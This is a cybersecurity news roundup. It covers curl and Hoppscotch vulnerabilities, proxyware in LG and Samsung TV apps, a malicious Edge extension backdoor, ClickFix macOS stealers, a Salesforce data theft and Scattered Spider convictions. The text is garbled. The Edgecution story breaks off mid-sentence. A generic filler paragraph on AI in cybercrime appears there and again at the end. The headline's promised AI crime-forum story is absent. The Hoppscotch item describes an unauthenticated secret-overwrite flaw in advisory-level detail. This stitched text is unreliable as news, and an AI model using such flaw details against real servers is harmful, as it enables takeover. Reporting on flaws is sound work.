Smart TVs Hijacked by Proxyware, a 24-Year-Old curl Vulnerability, and the Rise of AI-Powered Crime Forums — Plus 13 Other Stories You Missed

Cloudflare has joined forces with Google Chrome, Microsoft Edge, and Mozilla Firefox to develop a privacy-focused protocol that websites can adopt to distinguish legitimate human web traffic from unwanted network requests. This initiative leverages Private Access Control Tokens (PACT), which enable websites to issue anonymous tokens confirming that a particular browsing session is being operated by an actual person. “A user’s browser can then present these tokens to other sites to verify that a human is behind the interaction, cutting down on the need for frustrating and cumbersome captchas or intrusive tracking mechanisms,” Cloudflare explained. “PACT is architected so that sites cannot exploit it to track or identify users or their browsing behavior.”

AISLE reported that it uncovered six vulnerabilities in curl, spanning “classic memory-lifetime flaws to logic errors in how libcurl determines whether a connection, credential, or host identity remains valid.” Among the notable findings is CVE-2026-8932, which permits the library to “reuse an already-established connection even when certain mTLS configuration-related settings had been altered in a way that should have prevented reuse.” AISLE characterized it as the oldest curl vulnerability documented to date, noting that it has been present in releases since curl version 7.7, which debuted on March 22, 2001. The identified issues have been resolved in version 8.21.0.

A severe security vulnerability has been revealed in self-hosted deployments of Hoppscotch (CVE-2026-50160, CVSS score: 10.0), an open-source API platform, that can lead to total system compromise. Offgrid Security’s autonomous AI security agent, Kiro, has been acknowledged for discovering the flaw. “The POST /v1/onboarding/config endpoint permits an unauthenticated adversary to inject arbitrary InfraConfig keys — including JWT_SECRET and SESSION_SECRET — into the database via mass assignment,” the project maintainers stated. “These keys are absent from the SaveOnboardingConfigRequest DTO definition, but because the NestJS ValidationPipe does not strip extraneous properties, they travel through to the service layer, where Object.entries(dto) iterates over all keys without restriction.” Successful exploitation results in complete server takeover and persistent access that endures even after password resets. OffGrid Security informed The Hacker News that four independent vulnerabilities work in concert to allow an unauthenticated attacker to overwrite the JWT signing key in a single HTTP request, with the attack requiring no credentials whatsoever. The flaw has been patched in hoppscotch-backend version 2026.5.0.

A fresh report from Spur Intelligence has exposed that over one-third of LG and Samsung smart TV applications it examined include proxyware capable of relaying third-party traffic through the TV owner’s internet connection with users’ permission. The firm disclosed that it scanned 6,038 apps across LG webOS and Samsung Tizen and identified 2,058 that harbor residential proxy software. This encompasses clocks, screensavers, games, virtual fish tanks, and other low-utility applications. On LG webOS, 42.5% of apps carried such code. On Samsung Tizen, the figure stood at 26.9%. Across both platforms, the combined rate hit 34.1%. Bright Data, Massive, and Oxylabs rank as the top three SDK providers for webOS and Tizen. “Smart TVs are nearly perfect proxy hosts. They reside on the same home network as every other device, yet they don’t register as computers, so people seldom scrutinize them the way they would a computer,” Spur noted. “There’s no battery drain to catch attention, no cellular bill to spike, no app switcher filled with suspicious background activity. A television can remain powered in, logged in, and online for years while its owner treats it as mere furniture.” The threat intelligence company noted that this dynamic also reshapes the consent landscape, as users may not grasp what it truly means to sell access to their residential IP address. “From a technical standpoint, these applications comply with obtaining consent based on how they notify the user,” Spur CTO Alastair Parr told The Hacker News. “However, there is frequently no verification that the user is of legal age or authorized to grant consent on the device. The reality is that there are likely many smart TVs scattered across office environments and private homes, quietly participating in these networks, without the knowledge or approval of the responsible owners.” Amazon’s Device and System Abuse Policy explicitly prohibits apps that facilitate proxy services for third parties. Similar safeguards have been enacted by Roku as well. Nevertheless, LG and Samsung have yet to implement a comparable policy.

An initial access broker (IAB) connected to Payouts King ransomware has been detected posing as IT staff in social engineering campaigns carried out through Microsoft Teams to distribute a malicious Microsoft Edge browser extension codenamed Edgecution. “The method employs a malicious Microsoft Edge browser extension that exploits the Chrome native messaging protocol to interface with host-native applications beyond the boundaries of the browser sandbox,” Zscaler ThreatLabz explained. “By abusing this interface, the attackers secure direct host access, empowering them to tamper with the local filesystem, initiate processes, and run arbitrary code on the compromised machine.” The malware comprises two elements: a Microsoft Edge browser extension dubbed “Edge Monitoring Agent” that communicates with a command-and-control (C2) server and relays host-issued commands to a Python-based backdoor, which is capable of harvesting system data, listing active processes, providing filesystem access, and executing arbitrary Python code and shell commands. The extension remains invisible to the user because it operates within a headless Microsoft Edge browser session. A comparable attack sequence

The use of artificial intelligence in cybercrime is on the rise, with threat actors leveraging the technology to create more convincing phishing lures, automate attacks, and evade detection. This trend is expected to continue as AI tools become more accessible and sophisticated.

Competitive intelligence firm Klue disclosed that a credential from a 2022 pilot program was exploited by the Icarus extortion group to steal Salesforce data from its corporate clients, several of which are cybersecurity companies. Klue stated the credential was “originally provided to a third-party in 2022, for a limited pilot,” but did not elaborate on the pilot’s purpose, duration, or the third party’s identity. It remains unclear why the credential wasn’t revoked after the pilot ended or how attackers initially obtained it. Multiple companies, including 8×8, BeyondTrust, Gong, Jamf, HackerOne, Insurity, LastPass, OneTrust, Pendo, Recorded Future, Snyk, Sprout Social, and Tanium, have confirmed limited Salesforce data theft.

NCC Group reports growing evidence of nation-state actors increasingly using tools and tactics typical of financially motivated cybercrime to mask espionage and intelligence-gathering, blurring the lines between these activities. “Historically, organizations could draw a relatively clear distinction between ransomware attacks driven by financial gain and nation-state operations designed to support strategic objectives. That distinction is becoming increasingly difficult to make,” said Matt Hull, VP of Cyber Intelligence and Response at NCC Group. “What we’re seeing is a convergence of criminal and state-backed activity. Threat actors are sharing infrastructure, adopting common tooling, and, in some cases, deliberately operating behind established ransomware brands to obscure attribution and delay response efforts.”

Google is expanding its “Super Admin password reset” alert in Alert Center to a broader Admin password reset alert. “Previously, this rule only triggered alerts when a super admin’s password was changed,” the company explained. “With this update, the alert will now cover password resets for all administrator roles within your organization. This update provides admins with better visibility and control over the security of their organization’s privileged accounts. Monitoring password changes for all admin roles provides a higher level of oversight to respond more quickly to potential account compromises or unauthorized changes.” This change applies to all Google Workspace customers.

A new ClickFix campaign tricks users into copying malicious commands and pasting them into the Terminal app, which silently downloads and mounts a malicious DMG file. The disk image contains a self-signed information stealer capable of harvesting system passwords, browser data, wallet information, messaging app data, and Keychain contents, exfiltrating the data, establishing LaunchAgent persistence, and tampering with Ledger Live and Trezor Suite installations by replacing legitimate components to hijack cryptocurrency wallet data. According to Palo Alto Networks Unit 42, this stealer belongs to the Atomic macOS Stealer (AMOS) lineage, specifically a variant called Odyssey. This development follows the cybersecurity firm’s report on another multi-step ClickFix attack using techniques like brandsquatting to deliver a cross-platform trojan with capabilities including browser credential theft, remote shell access, live screen streaming, keylogging, file management, and SSH tunneling.

Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, were convicted in the U.K. for orchestrating a 2024 cyber attack on Transport for London (TfL) that caused $38.2 million in losses. The two, members of the online criminal group Scattered Spider, were arrested last September but pleaded not guilty during a November 2025 court appearance. Sentencing is scheduled for July 16, 2026. “Scattered Spider is a prolific criminal group that engages in data extortion and other criminal activities, utilizing social engineering techniques and SIM swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication,” the U.S. Federal Bureau of Investigation (FBI) stated.

Abdellah Belmili (aka Dila Belmili or SPOX), a 26-year-old Algerian national, has been arrested, charged, and extradited from Spain to the U.S. on conspiracy to commit bank fraud charges. SPOX allegedly administered a cybercrime marketplace (“www.market0day[.]com”) and created phishing kits used to compromise major U.S. financial institutions. “Between September and November 2020, Belmili advertised the marketplace and facilitated some of the customer support for the marketplace on his personal Telegram channel @SpoxCoder,” the U.S. Justice Department said. “In late December 2020, after several customers complained that they had not received their purchases from www.market0day[.]com, Belmili replied that he was no longer the administrator, and instead had opened up a new marketplace – www.spoxy[.]us, advertising the new marketplace as a ‘new store for bulk SMS.’ ‘Bulk SMS’ typically refers to sending phishing or other fraudulent messages via text message.” Approximately 5,600 U.S. and international victims have been identified.

A new phishing campaign abuses Outlook Groups and Microsoft 365 collaboration features to “make malicious activity appear routine,” according to Fortra. The attack involves adding targets to an attacker-controlled Microsoft 365 group, then using the group mailbox, shared files, or fake calendar invites (CalPhishing) to facilitate credential theft, token capture, or malware delivery. “The technique shifts malicious intent away from a single phishing email into a trusted productivity workflow,” the company explained. “A user may see what looks like a normal group addition, internal update, shared resource, or calendar item before being pushed toward an action.”

The use of artificial intelligence in cybercrime is increasing, with threat actors using the technology to craft more convincing phishing lures, automate attacks, and evade detection. This trend is expected to persist as AI tools become more accessible and advanced.